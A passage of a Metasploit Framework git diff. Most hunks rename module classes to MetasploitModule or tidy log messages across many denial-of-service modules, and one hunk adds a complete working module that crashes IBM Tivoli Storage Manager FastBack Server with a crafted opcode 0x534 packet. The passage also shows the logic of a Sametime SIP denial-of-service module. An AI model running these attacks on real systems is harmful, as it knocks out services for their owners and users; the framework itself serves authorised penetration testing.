print_status("#{peer} - Checking if user #{@sipuri} is online") + print_status("Checking if user #{@sipuri} is online") if check_user - print_good("#{peer} - User online") + print_good("User online") else - print_status("#{peer} - User offline") + print_status("User offline") end return end # DOS action - print_status("#{peer} - Checking if user #{@sipuri} is online") + print_status("Checking if user #{@sipuri} is online") check_result = check_user if check_result == false - print_error("#{peer} - User is already offline... Exiting...") + print_error("User is already offline... Exiting...") return end # only proceed if action is DOS the target user is # online or the CHECKUSER option has been disabled - print_status("#{peer} - Targeting user: #{@sipuri}...") + print_status("Targeting user: #{@sipuri}...") dos_result = dos_user if dos_result - print_good("#{peer} - User is offline, DoS was successful") + print_good("User is offline, DoS was successful") else - print_error("#{peer} - User is still online") + print_error("User is still online") end end @@ -122,22 +122,22 @@ class Metasploit3 < Msf::Auxiliary res = send_msg(msg) if res.nil? - vprint_good("#{peer} - User #{@sipuri} is no responding") + vprint_good("User #{@sipuri} is no responding") return true elsif res =~ /430 Flow Failed/i - vprint_good("#{peer} - DoS packet successful. Response received (430 Flow Failed)") - vprint_good("#{peer} - User #{@sipuri} is no longer responding") + vprint_good("DoS packet successful. Response received (430 Flow Failed)") + vprint_good("User #{@sipuri} is no longer responding") return true elsif res =~ /404 Not Found/i - vprint_error("#{peer} - DoS packet appears successful. Response received (404 Not Found)") - vprint_status("#{peer} - User appears to be currently offline or not in a Sametime video session") + vprint_error("DoS packet appears successful. Response received (404 Not Found)") + vprint_status("User appears to be currently offline or not in a Sametime video session") return true elsif res =~ /200 OK/i vrint_error("#{peer} - DoS packet unsuccessful. Response received (200)") vrint_status("#{peer} - Check user is running an effected version of IBM Lotus Sametime WebPlayer") return false else - vprint_status("#{peer} - Unexpected response") + vprint_status("Unexpected response") return true end end @@ -150,26 +150,26 @@ class Metasploit3 < Msf::Auxiliary # check response for current user status - common return codes if res.nil? - vprint_error("#{peer} - No response") + vprint_error("No response") return false elsif res =~ /430 Flow Failed/i - vprint_good("#{peer} - User #{@sipuri} is no longer responding (already DoS'd?)") + vprint_good("User #{@sipuri} is no longer responding (already DoS'd?)") return false elsif res =~ /404 Not Found/i - vprint_error("#{peer} - User #{@sipuri} is currently offline or not in a Sametime video session") + vprint_error("User #{@sipuri} is currently offline or not in a Sametime video session") return false elsif res =~ /200 OK/i - vprint_good("#{peer} - User #{@sipuri} is online") + vprint_good("User #{@sipuri} is online") return true else - vprint_error("#{peer} - Unknown server response") + vprint_error("Unknown server response") return false end end def create_message(length) # create SIP MESSAGE of specified length - vprint_status("#{peer} - Creating SIP MESSAGE packet #{length} bytes long") + vprint_status("Creating SIP MESSAGE packet #{length} bytes long") source_user = Rex::Text.rand_text_alphanumeric(rand(8)+1) source_host = Rex::Socket.source_address(datastore['RHOST']) @@ -215,13 +215,13 @@ class Metasploit3 < Msf::Auxiliary end return res rescue ::Rex::ConnectionRefused - print_status("#{peer} - Unable to connect") + print_status("Unable to connect") return nil rescue ::Errno::ECONNRESET - print_status("#{peer} - DoS packet successful, host not responding.") + print_status("DoS packet successful, host not responding.") return nil rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_status("#{peer} - Couldn't connect") + print_status("Couldn't connect") return nil ensure # disconnect socket if still open diff --git a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb new file mode 100644 index 0000000000..72784a7589 --- /dev/null +++ b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb @@ -0,0 +1,82 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Auxiliary + + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Dos + + def initialize(info={}) + super(update_info(info, + 'Name' => "IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service", + 'Description' => %q{ + This module exploits a denial of service condition present in IBM Tivoli Storage Manager + FastBack Server when dealing with packets triggering the opcode 0x534 handler. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Gianni Gnesa', # Public disclosure/Proof of Concept + 'William Webb ', # Metasploit + ], + 'References' => + [ + ['EDB', '38979'], + ['OSVDB', '132307'] + ], + 'DisclosureDate' => "Dec 15 2015", + )) + + register_options( + [ + Opt::RPORT(11460) + ], self.class) + end + + def tv_pkt(opcode, p1="", p2="", p3="") + buf = Rex::Text.rand_text_alpha(0x0C) + buf += [opcode].pack("V") + buf += [0x00].pack("V") + buf += [p1.length].pack("V") + buf += [p1.length].pack("V") + buf += [p2.length].pack("V") + buf += [p1.length + p2.length].pack("V") + buf += [p3.length].pack("V") + + buf += Rex::Text.rand_text_alpha(0x08) + + buf += p1 + buf += p2 + buf += p3 + + pkt = [buf.length].pack("N") + pkt << buf + + return pkt + end + + def run + target_opcode = 0x534 + connect + print_status("Connected to: #{rhost} port: #{rport}") + print_status("Sending malicious packet") + + p = tv_pkt(target_opcode, + "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % [Rex::Text.rand_text_alpha(0x200),0,0,0,0], + Rex::Text.rand_text_alpha(0x60), + Rex::Text.rand_text_alpha(0x60) + ) + + sock.put(p) + print_status("Packet sent!") + rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => ex + print_status("Exploit failed: #{ex.class} #{ex.message}") + elog("#{ex.class} #{ex.message}\n#{ex.backtrace * "\n"}") + ensure + disconnect + end +end diff --git a/modules/auxiliary/dos/misc/memcached.rb b/modules/auxiliary/dos/misc/memcached.rb index f120cc3aa2..30a34e6db2 100644 --- a/modules/auxiliary/dos/misc/memcached.rb +++ b/modules/auxiliary/dos/misc/memcached.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb b/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb index 73a64cd658..cabca95f30 100644 --- a/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb +++ b/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb b/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb index 949a673013..9d96f4b83c 100644 --- a/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb +++ b/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb b/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb index ec88b8823a..82987c5a44 100644 --- a/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb +++ b/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/dos/samba/lsa_transnames_heap.rb b/modules/auxiliary/dos/samba/lsa_transnames_heap.rb index 34a5af994f..f7154392e6 100644 --- a/modules/auxiliary/dos/samba/lsa_transnames_heap.rb +++ b/modules/auxiliary/dos/samba/lsa_transnames_heap.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/dos/samba/read_nttrans_ea_list.rb b/modules/auxiliary/dos/samba/read_nttrans_ea_list.rb index a550c617b1..29c49031b9 100644 --- a/modules/auxiliary/dos/samba/read_nttrans_ea_list.rb +++ b/modules/auxiliary/dos/samba/read_nttrans_ea_list.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/struct2' require 'rex/proto/smb' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB::Client::Authenticated diff --git a/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb b/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb index e4aa509cd1..9eeeadf3ed 100644 --- a/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb +++ b/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/dos/scada/beckhoff_twincat.rb b/modules/auxiliary/dos/scada/beckhoff_twincat.rb index 10cfb38841..dab3f2bda3 100644 --- a/modules/auxiliary/dos/scada/beckhoff_twincat.rb +++ b/modules/auxiliary/dos/scada/beckhoff_twincat.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/scada/d20_tftp_overflow.rb b/modules/auxiliary/dos/scada/d20_tftp_overflow.rb index 76e35d1b59..6317644378 100644 --- a/modules/auxiliary/dos/scada/d20_tftp_overflow.rb +++ b/modules/auxiliary/dos/scada/d20_tftp_overflow.rb @@ -17,7 +17,7 @@ require 'msf/core' require 'rex/ui/text/shell' require 'rex/proto/tftp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Rex::Ui::Text include Rex::Proto::TFTP include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/dos/scada/igss9_dataserver.rb b/modules/auxiliary/dos/scada/igss9_dataserver.rb index a97481a1af..debb192254 100644 --- a/modules/auxiliary/dos/scada/igss9_dataserver.rb +++ b/modules/auxiliary/dos/scada/igss9_dataserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/scada/yokogawa_logsvr.rb b/modules/auxiliary/dos/scada/yokogawa_logsvr.rb index 4149967eaf..4badcfb019 100644 --- a/modules/auxiliary/dos/scada/yokogawa_logsvr.rb +++ b/modules/auxiliary/dos/scada/yokogawa_logsvr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/smtp/sendmail_prescan.rb b/modules/auxiliary/dos/smtp/sendmail_prescan.rb index 86fc52f7f2..e6b422ee8c 100644 --- a/modules/auxiliary/dos/smtp/sendmail_prescan.rb +++ b/modules/auxiliary/dos/smtp/sendmail_prescan.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb b/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb index 3ec73403ae..ec9d7a1492 100644 --- a/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb +++ b/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb b/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb index 2dddf9a25f..e045bd5348 100644 --- a/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb +++ b/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Dos include Msf::Exploit::Capture diff --git a/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb b/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb index 78ad298e42..c1939e64e4 100644 --- a/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb +++ b/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Dos include Exploit::Remote::Udp diff --git a/modules/auxiliary/dos/ssl/openssl_aesni.rb b/modules/auxiliary/dos/ssl/openssl_aesni.rb index 76f0db506d..70ac830a9e 100644 --- a/modules/auxiliary/dos/ssl/openssl_aesni.rb +++ b/modules/auxiliary/dos/ssl/openssl_aesni.rb @@ -6,7 +6,7 @@ # auxilary/dos/ssl/openssl_aesni require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb b/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb index c9704300cb..036d5708b4 100644 --- a/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb +++ b/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/tcp/junos_tcp_opt.rb b/modules/auxiliary/dos/tcp/junos_tcp_opt.rb index a44a526850..d2b27eecd1 100644 --- a/modules/auxiliary/dos/tcp/junos_tcp_opt.rb +++ b/modules/auxiliary/dos/tcp/junos_tcp_opt.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/tcp/synflood.rb b/modules/auxiliary/dos/tcp/synflood.rb index 0ba1568205..9243b54a8d 100644 --- a/modules/auxiliary/dos/tcp/synflood.rb +++ b/modules/auxiliary/dos/tcp/synflood.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/upnp/miniupnpd_dos.rb b/modules/auxiliary/dos/upnp/miniupnpd_dos.rb index cee1464fe9..fa074f33a7 100644 --- a/modules/auxiliary/dos/upnp/miniupnpd_dos.rb +++ b/modules/auxiliary/dos/upnp/miniupnpd_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/appian/appian_bpm.rb b/modules/auxiliary/dos/windows/appian/appian_bpm.rb index 9dfea04d72..f239bce52f 100644 --- a/modules/auxiliary/dos/windows/appian/appian_bpm.rb +++ b/modules/auxiliary/dos/windows/appian/appian_bpm.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb b/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb index 18ac1c4212..5ad8dc5493 100644 --- a/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb +++ b/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML @@ -28,6 +28,9 @@ class Metasploit3 < Msf::Auxiliary [ 'MSB', 'MS09-065' ], [ 'OSVDB', '59869'] ], + 'Actions' => [[ 'WebServer' ]], + 'PassiveActions' => [ 'WebServer' ], + 'DefaultAction' => 'WebServer', 'DisclosureDate' => 'Nov 10 2009' )) register_options([ diff --git a/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb b/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb index 5686914817..570ef3994d 100644 --- a/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb +++ b/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb b/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb index b082718fe9..78e2cbfc31 100644 --- a/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb +++ b/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb b/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb index 8a2a932f4f..7b62702876 100644 --- a/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb +++ b/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb b/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb index ac1e6022f9..8cccf0ebb4 100644 --- a/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb +++ b/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb b/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb index dc8ec4092e..415e837c28 100644 --- a/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb +++ b/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/solarftp_user.rb b/modules/auxiliary/dos/windows/ftp/solarftp_user.rb index b2288b7b1c..59b12e6922 100644 --- a/modules/auxiliary/dos/windows/ftp/solarftp_user.rb +++ b/modules/auxiliary/dos/windows/ftp/solarftp_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/titan626_site.rb b/modules/auxiliary/dos/windows/ftp/titan626_site.rb index e97dc9134f..960caad59d 100644 --- a/modules/auxiliary/dos/windows/ftp/titan626_site.rb +++ b/modules/auxiliary/dos/windows/ftp/titan626_site.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb b/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb index 4db6db9836..f83dbc13dc 100644 --- a/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb +++ b/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb b/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb index b948914501..fc65243095 100644 --- a/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb +++ b/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb b/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb index db9d2e31c5..3e6f11f24c 100644 --- a/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb +++ b/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb b/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb index ed94c74c86..e93a079cfc 100644 --- a/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb +++ b/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/games/kaillera.rb b/modules/auxiliary/dos/windows/games/kaillera.rb index c2fddc489a..19130361c1 100644 --- a/modules/auxiliary/dos/windows/games/kaillera.rb +++ b/modules/auxiliary/dos/windows/games/kaillera.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb b/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb index c1003c6a87..517ce4a0c8 100644 --- a/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb +++ b/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/http/pi3web_isapi.rb b/modules/auxiliary/dos/windows/http/pi3web_isapi.rb index daf6ad587d..2dfb95de64 100644 --- a/modules/auxiliary/dos/windows/http/pi3web_isapi.rb +++ b/modules/auxiliary/dos/windows/http/pi3web_isapi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb b/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb index afb0eda518..f8be0ff9d5 100644 --- a/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb +++ b/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/nat/nat_helper.rb b/modules/auxiliary/dos/windows/nat/nat_helper.rb index 09189c625e..d251700318 100644 --- a/modules/auxiliary/dos/windows/nat/nat_helper.rb +++ b/modules/auxiliary/dos/windows/nat/nat_helper.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb b/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb index 61ea317635..a64a28454f 100644 --- a/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb +++ b/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb b/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb index 79d649c253..e1e0065efc 100644 --- a/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb +++ b/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb b/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb index fffd69b8dd..29ec0f804c 100644 --- a/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb +++ b/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb b/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb index f60c224d7d..d5a480e758 100644 --- a/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb +++ b/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smb/ms09_001_write.rb b/modules/auxiliary/dos/windows/smb/ms09_001_write.rb index 65d494e2a3..7b51b4ae98 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_001_write.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_001_write.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb index 78ebe1e3af..6763919a40 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb index fe436b7ef0..41a1ad0808 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb b/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb index 692d3080de..08c0cb47db 100644 --- a/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb +++ b/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb b/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb index 25fec756b7..5cff79cdfd 100644 --- a/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb +++ b/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include 